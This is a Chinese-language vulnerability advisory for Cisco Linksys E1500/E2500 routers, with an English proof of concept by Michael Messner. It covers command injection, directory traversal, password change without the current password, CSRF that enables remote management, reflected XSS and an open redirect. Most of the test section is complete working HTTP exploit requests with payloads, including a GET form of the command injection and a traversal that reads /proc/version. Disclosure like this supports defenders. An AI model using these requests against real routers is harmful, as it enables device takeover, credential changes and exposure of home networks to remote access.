发布日期:2013-02-06
更新日期:2013-02-19
受影响系统:
Cisco Linksys E1500 1.0.05 - build 1
Cisco Linksys E1500 1.0.04 - build 2
Cisco Linksys E1500 1.0.00 - build 9
Cisco Linksys E2500 1.0.03
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 57760
Cisco Linksys E1500/E2500是使用SpeedBoost技术的无线N路由器。
Linksys E1500/E2500在实现上存在命令注入漏洞、安全绕过漏洞、跨站请求伪造漏洞、跨站脚本执行漏洞、目录穿越漏洞、URI重定向漏洞。攻击者可利用这些漏洞执行任意命令、钓鱼攻击、绕过安全限制、窃取cookie、访问系统和其他配置文件、在用户会话上下文中执行未授权操作。
1, OS命令注入。
参数:ping_size=%26ping%20192%2e168%2e178%2e102%26
此漏洞源于ping_size参数缺失输入验证。
2, 目录遍历。
参数:next_page
3, 更改旧密码,无需输入当前密码。
4, CSRF漏洞,无需知道当前密码,即可更改密码。攻击者可以激活远程管理。
5, 反射跨站脚本执行。
参数:wait_time=3'%3balert('pwnd')//
6, 重定向漏洞
参数:submit_button=http://www.pwnd.pwnd%0a
<*来源:Michael Messner (michae.messner@integralis.com)
链接:
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Michael Messner (michae.messner@integralis.com)提供了如下测试方法:
============ Vulnerability Overview: ============
OS Command Injection / E1500 and E2500 v1.0.03
=> Parameter: ping_size=%26ping%20192%2e168%2e178%2e102%26
The vulnerability is caused by missing input validation in the ping_size parameter and can be exploited to inject and execute arbitrary shell commands. It is possible to start a telnetd or upload and execute a backdoor to compromise the device.
You need to be authenticated to the device or you have to find other methods for inserting the malicious commands.
Example Exploit:
POST /apply.cgi HTTP/1.1
Host: 192.168.178.199
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:14.0) Gecko/20100101 Firefox/14.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Referer:
Authorization: Basic xxxx
Content-Type: application/x-www-form-urlencoded
Content-Length: 185
Connection: close
submit_button=Diagnostics&change_action=gozila_cgi&submit_type=start_ping&action=&commit=0&ping_ip=1.1.1.1&ping_size=%26ping%20192%2e168%2e178%2e102%26&ping_times=5&traceroute_ip=
Change the request methode from HTTP Post to HTTP GET makes the exploitation easier:
?submit_button=Diagnostics&change_action=gozila_cgi&submit_type=start_ping&action=&commit=0&ping_ip=1.1.1.1&ping_size=%26COMMAND%26&ping_times=5&traceroute_ip=
Directory traversal - tested on E1500:
=> parameter: next_page
Access local files of the device. You need to be authenticated or you have to find other methods for accessing the device.
Request:
POST /apply.cgi HTTP/1.1
Host: 192.168.178.199
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Referer:
Authorization: Basic YWRtaW46YWRtaW4=
Content-Type: application/x-www-form-urlencoded
Content-Length: 75
submit_type=wsc_method2&change_action=gozila_cgi&next_page=../../proc/version
Response:
HTTP/1.1 200 Ok
Server: httpd
Date: Thu, 01 Jan 1970 00:00:29 GMT
Cache-Control: no-cache
Pragma: no-cache
Expires: 0
Content-Type: text/html
Connection: close
Linux version 2.6.22 (cjc@t.sw3) (gcc version 4.2.3) #10 Thu Aug 23 11:16:42 HKT 2012
For changing the current password there is no request of the current password - tested on E1500
With this vulnerability an attacker is able to change the current password without knowing it. The attacker needs access to an authenticated browser.
Example Request:
POST /apply.cgi HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Referer:
Authorization: Basic xxxx
Content-Type: application/x-www-form-urlencoded
Content-Length: 311
submit_button=Management&change_action=&action=Apply&PasswdModify=1&http_enable=1&https_enable=0&ctm404_enable=&remote_mgt_https=0&wait_time=4&need_reboot=0&http_passwd=admin&http_passwdConfirm=admin&_http_enable=1&web_wl_filter=0&remote_management=0&nf_alg_sip=0&upnp_enable=1&upnp_config=1&upnp_internet_dis=0
CSRF for changing the password without knowing the current one and the attacker is able to activate the remote management - tested on E1500:
<IP>/apply.cgi?submit_button=Management&change_action=&action=Apply&PasswdModify=1&http_enable=1&https_enable=0&ctm404_enable=&remote_mgt_https=0&wait_time=4&need_reboot=0&http_passwd=password1&http_passwdConfirm=password1&_http_enable=1&web_wl_filter=0&remote_management=1&_remote_mgt_https=1&remote_upgrade=0&remote_ip_any=1&http_wanport=8080&nf_alg_sip=0&upnp_enable=1&upnp_config=1&upnp_internet_dis=0
Reflected Cross Site Scripting - tested on E1500
=> Parameter: wait_time=3'%3balert('pwnd')//
Injecting scripts into the parameter wait_time reveals that this parameter is not properly validated for malicious input.
Example Exploit:
POST /apply.cgi HTTP/1.1
Host: 192.168.178.199
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Referer:
Authorization: Basic xxxx
Content-Type: application/x-www-form-urlencoded
Content-Length: 300
submit_button=Wireless_Basic&action=Apply&submit_type=&change_action=&next_page=&commit=1&wl0_nctrlsb=none&channel_24g=0&nbw_24g=20&wait_time=3'%3balert('pwnd')//&guest_ssid=Cisco-guest&wsc_security_mode=&wsc_smode=1&net_mode_24g=mixed&ssid_24g=Cisco&_wl0_nbw=20&_wl0_channel=0&closed_24g=0